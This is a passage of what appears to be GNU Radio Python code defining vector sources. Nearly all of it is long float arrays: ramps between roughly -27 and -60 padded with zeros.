,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,
0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,-27.0,-27.1,-27.1,-27.2,-27.2,-27.3,-27.4,-27.4,-27.5,-27.5,-27.6,-27.7,-27.7,-27.8,-27.8,-27.9,-28.0,-28.0,-28.1,-28.1,-28.2,-28.3,-28.3,-28.4,-28.4,-28.5,-28.6,-28.6,-28.7,-28.7,-28.8,-28.9,-28.9,-29.0,-29.0,-29.1,-29.2,-29.2,-29.3,-29.3,-29.4,-29.5,-29.5,-29.6,-29.6,-29.7,-29.8,-29.8,-29.9,-29.9,-30.0,-30.1,-30.1,-30.2,-30.2,-30.3,-30.4,-30.4,-30.5,-30.5,-30.6,-30.7,-30.7,-30.8,-30.8,-30.9,-31.0,-31.0,-31.1,-31.1,-31.2,-31.3,-31.3,-31.4,-31.4,-31.5,-31.6,-31.6,-31.7,-31.7,-31.8,-31.9,-31.9,-32.0,-32.0,-32.1,-32.2,-32.2,-32.3,-32.3,-32.4,-32.5,-32.5,-32.6,-32.7,-32.7,-32.8,-32.8,-32.9,-33.0,-33.0,-33.1,-33.1,-33.2,-33.3,-33.3,-33.4,-33.4,-33.5,-3
3.6,-33.6,-33.7,-33.7,-33.8,-33.9,-33.9,-34.0,-34.0,-34.1,-34.2,-34.2,-34.3,-34.3,-34.4,-34.5,-34.5,-34.6,-34.6,-34.7,-34.8,-34.8,-34.9,-34.9,-35.0,-35.1,-35.1,-35.2,-35.2,-35.3,-35.4,-35.4,-35.5,-35.5,-35.6,-35.7,-35.7,-35.8,-35.8,-35.9,-36.0,-36.0,-36.1,-36.1,-36.2,-36.3,-36.3,-36.4,-36.4,-36.5,-36.6,-36.6,-36.7,-36.7,-36.8,-36.9,-36.9,-37.0,-37.0,-37.1,-37.2,-37.2,-37.3,-37.3,-37.4,-37.5,-37.5,-37.6,-37.6,-37.7,-37.8,-37.8,-37.9,-37.9,-38.0,-38.1,-38.1,-38.2,-38.2,-38.3,-38.4,-38.4,-38.5,-38.5,-38.6,-38.7,-38.7,-38.8,-38.8,-38.9,-39.0,-39.0,-39.1,-39.1,-39.2,-39.3,-39.3,-39.4,-39.4,-39.5,-39.6,-39.6,-39.7,-39.7,-39.8,-39.9,-39.9,-40.0,-40.0,-40.1,-40.2,-40.2,-40.3,-40.3,-40.4,-40.5,-40.5,-40.6,-40.6,-40.7,-40.8,-40.8,-40.9,-40.9,-41.0,-41.1,-41.1,-41.2,-41.2,-41.3,-41.4,-41.4,-41.5,-41.5,-41.6,-41.7,-41.7,-41.8,-41.8,-41.9,-42.0,-42.0,-42.1,-42.1,-42.2,-42.3,-42.3,-42.4,-42.4,-42.5,-42.6,-42.6,-42.7,-42.7,-42.8,-42.9,-42.9,-43.0,-43.0,-43.1,-43.2,-43.2,-43.3,-43.3,-43.4,-43.5,-43.5,-43.6,-43.7,-43.7,-43.8,-43.8,-43.9,-44.0,-44.0,-44.1,-44.1,-44.2,-44.3,-44.3,-44.4,-44.4,-44.5,-44.6,-44.6,-44.7,-44.7,-44.8,-44.9,-44.9,-45.0,-45.0,-45.1,-45.2,-45.2,-45.3,-45.3,-45.4,-45.5,-45.5,-45.6,-45.6,-45.7,-45.8,-45.8,-45.9,-45.9,-46.0,-46.1,-46.1,-46.2,-46.2,-46.3,-46.4,-46.4,-46.5,-46.5,-46.6,-46.7,-46.7,-46.8,-46.8,-46.9,-47.0,-47.0,-47.1,-47.1,-47.2,-47.3,-47.3,-47.4,-47.4,-47.5,-47.6,-47.6,-47.7,-47.7,-47.8,-47.9,-47.9,-48.0,-48.0,-48.1,-48.2,-48.2,-48.3,-48.3,-48.4,-48.5,-48.5,-48.6,-48.6,-48.7,-48.8,-48.8,-48.9,-48.9,-49.0,-49.1,-49.1,-49.2,-49.2,-49.3,-49.4,-49.4,-49.5,-49.5,-49.6,-49.7,-49.7,-49.8,-49.8,-49.9,-50.0,-50.0,-50.1,-50.1,-50.2,-50.3,-50.3,-50.4,-50.4,-50.5,-50.6,-50.6,-50.7,-50.7,-50.8,-50.9,-50.9,-51.0,-51.0,-51.1,-51.2,-51.2,-51.3,-51.3,-51.4,-51.5,-51.5,-51.6,-51.6,-51.7,-51.8,-51.8,-51.9,-51.9,-52.0,-52.1,-52.1,-52.2,-52.2,-52.3,-52.4,-52.4,-52.5,-52.5,-52.6,-52.7,-52.7,-52.8,-52.8,-52.9,-53.0,-53.0,-53.1,-53.1,-53.2,-53.3,-53.3,-53.4,-53.4,-53.5,-53.
6,-53.6,-53.7,-53.7,-53.8,-53.9,-53.9,-54.0,-54.0,-54.1,-54.2,-54.2,-54.3,-54.3,-54.4,-54.5,-54.5,-54.6,-54.7,-54.7,-54.8,-54.8,-54.9,-55.0,-55.0,-55.1,-55.1,-55.2,-55.3,-55.3,-55.4,-55.4,-55.5,-55.6,-55.6,-55.7,-55.7,-55.8,-55.9,-55.9,-56.0,-56.0,-56.1,-56.2,-56.2,-56.3,-56.3,-56.4,-56.5,-56.5,-56.6,-56.6,-56.7,-56.8,-56.8,-56.9,-56.9,-57.0,-57.1,-57.1,-57.2,-57.2,-57.3,-57.4,-57.4,-57.5,-57.5,-57.6,-57.7,-57.7,-57.8,-57.8,-57.9,-58.0,-58.0,-58.1,-58.1,-58.2,-58.3,-58.3,-58.4,-58.4,-58.5,-58.6,-58.6,-58.7,-58.7,-58.8,-58.9,-58.9,-59.0,-59.0,-59.1,-59.2,-59.2,-59.3,-59.3,-59.4,-59.5,-59.5,-59.6,-59.6,-59.7,-59.8,-59.8,-59.9,-59.9,-60.0), True, 1, [])
self.blocks_vector_source_x_0_0 = blocks.vector_source_f((-50.0,-50.0,-49.9,-49.9,-49.8,-49.8,-49.7,-49.7,-49.7,-49.6,-49.6,-49.5,-49.5,-49.5,-49.4,-49.4,-49.3,-49.3,-49.2,-49.2,-49.2,-49.1,-49.1,-49.0,-49.0,-49.0,-48.9,-48.9,-48.8,-48.8,-48.7,-48.7,-48.7,-48.6,-48.6,-48.5,-48.5,-48.4,-48.4,-48.4,-48.3,-48.3,-48.2,-48.2,-48.2,-48.1,-48.1,-48.0,-48.0,-47.9,-47.9,-47.9,-47.8,-47.8,-47.7,-47.7,-47.7,-47.6,-47.6,-47.5,-47.5,-47.4,-47.4,-47.4,-47.3,-47.3,-47.2,-47.2,-47.2,-47.1,-47.1,-47.0,-47.0,-46.9,-46.9,-46.9,-46.8,-46.8,-46.7,-46.7,-46.6,-46.6,-46.6,-46.5,-46.5,-46.4,-46.4,-46.4,-46.3,-46.3,-46.2,-46.2,-46.1,-46.1,-46.1,-46.0,-46.0,-45.9,-45.9,-45.9,-45.8,-45.8,-45.7,-45.7,-45.6,-45.6,-45.6,-45.5,-45.5,-45.4,-45.4,-45.3,-45.3,-45.3,-45.2,-45.2,-45.1,-45.1,-45.1,-45.0,-45.0,-44.9,-44.9,-44.8,-44.8,-44.8,-44.7,-44.7,-44.6,-44.6,-44.6,-44.5,-44.5,-44.4,-44.4,-44.3,-44.3,-44.3,-44.2,-44.2,-44.1,-44.1,-44.1,-44.0,-44.0,-43.9,-43.9,-43.8,-43.8,-43.8,-43.7,-43.7,-43.6,-43.6,-43.5,-43.5,-43.5,-43.4,-43.4,-43.3,-43.3,-43.3,-43.2,-43.2,-43.1,-43.1,-43.0,-43.0,-43.0,-42.9,-42.9,-42.8,-42.8,-42.8,-42.7,-42.7,-42.6,-42.6,-42.5,-42.5,-42.5,-42.4,-42.4,-42.3,-42.3,-42.2,-42.2,-42.2,-42.1,-42.1,-42.0,-42.0,-42.0,-41.9,-41.9,-41.8,-41.8,-41.7,-41.7,-41.7,-41.6,-41.6,-41.5,-41.5,-41.5,-41.4,-41.4,-41.3,-41.3,-41.2,-41.2,-41.2,-41.1,-41.1,-41.0,-41.0,-41.0,-40.9,-40.9,-40.8,-40.8,-40.7,-40.7,-40.7,-40.6,-40.6,-40.5,-40.5,-40.4,-40.4,-40.4,-40.3,-40.3,-40.2,-40.2,-40.2,-40.1,-40.1,-40.0,-40.0,-39.9,-39.9,-39.9,-39.8,-39.8,-39.7,-39.7,-39.7,-39.6,-39.6,-39.5,-39.5,-39.4,-39.4,-39.4,-39.3,-39.3,-39.2,-39.2,-39.1,-39.1,-39.1,-39.0,-39.0,-38.9,-38.9,-38.9,-38.8,-38.8,-38.7,-38.7,-38.6,-38.6,-38.6,-38.5,-38.5,-38.4,-38.4,-38.4,-38.3,-38.3,-38.2,-38.2,-38.1,-38.1,-38.1,-38.0,-38.0,-37.9,-37.9,-37.9,-37.8,-37.8,-37.7,-37.7,-37.6,-37.6,-37.6,-37.5,-37.5,-37.4,-37.4,-37.3,-37.3,-37.3,-37.2,-37.2,-37.1,-37.1,-37.1,-37.0,-37.0,-36.9,-36.9,-36.8,-36.8,-36.8,-36.7,-36.7,-36.6,-36.6,-36.6,-36.5,-36.
5,-36.4,-36.4,-36.3,-36.3,-36.3,-36.2,-36.2,-36.1,-36.1,-36.0,-36.0,-36.0,-35.9,-35.9,-35.8,-35.8,-35.8,-35.7,-35.7,-35.6,-35.6,-35.5,-35.5,-35.5,-35.4,-35.4,-35.3,-35.3,-35.3,-35.2,-35.2,-35.1,-35.1,-35.0,-35.0,-35.0,-34.9,-34.9,-34.8,-34.8,-34.8,-34.7,-34.7,-34.6,-34.6,-34.5,-34.5,-34.5,-34.4,-34.4,-34.3,-34.3,-34.2,-34.2,-34.2,-34.1,-34.1,-34.0,-34.0,-34.0,-33.9,-33.9,-33.8,-33.8,-33.7,-33.7,-33.7,-33.6,-33.6,-33.5,-33.5,-33.5,-33.4,-33.4,-33.3,-33.3,-33.2,-33.2,-33.2,-33.1,-33.1,-33.0,-33.0,-32.9,-32.9,-32.9,-32.8,-32.8,-32.7,-32.7,-32.7,-32.6,-32.6,-32.5,-32.5,-32.4,-32.4,-32.4,-32.3,-32.3,-32.2,-32.2,-32.2,-32.1,-32.1,-32.0,-32.0,-31.9,-31.9,-31.9,-31.8,-31.8,-31.7,-31.7,-31.7,-31.6,-31.6,-31.5,-31.5,-31.4,-31.4,-31.4,-31.3,-31.3,-31.2,-31.2,-31.1,-31.1,-31.1,-31.0,-31.0,-30.9,-30.9,-30.9,-30.8,-30.8,-30.7,-30.7,-30.6,-30.6,-30.6,-30.5,-30.5,-30.4,-30.4,-30.4,-30.3,-30.3,-30.2,-30.2,-30.1,-30.1,-30.1,-30.0,-30.0,-29.9,-29.9,-29.8,-29.8,-29.8,-29.7,-29.7,-29.6,-29.6,-29.6,-29.5,-29.5,-29.4,-29.4,-29.3,-29.3,-29.3,-29.2,-29.2,-29.1,-29.1,-29.1,-29.0,-29.0,-28.9,-28.9,-28.8,-28.8,-28.8,-28.7,-28.7,-28.6,-28.6,-28.6,-28.5,-28.5,-28.4,-28.4,-28.3,-28.3,-28.3,-28.2,-28.2,-28.1,-28.1,-28.0,-28.0,-28.0,-27.9,-27.9,-27.8,-27.8,-27.8,-27.7,-27.7,-27.6,-27.6,-27.5,-27.5,-27.5,-27.4,-27.4,-27.3,-27.3,-27.3,-27.2,-27.2,-27.1,-27.1,-27.0,-27.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.
0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.
0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.
0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.
